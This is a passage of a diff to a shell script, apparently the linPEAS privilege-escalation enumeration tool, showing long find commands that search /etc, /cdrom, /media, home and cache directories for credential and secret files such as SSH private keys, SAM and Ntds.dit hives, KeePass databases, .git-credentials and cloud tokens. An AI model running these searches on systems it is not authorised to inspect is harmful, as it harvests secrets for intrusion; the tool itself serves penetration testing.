\"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"*knockd*\" -o -name \".gitconfig\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB=`eval_bckgrd "find /lib -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find /media -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name 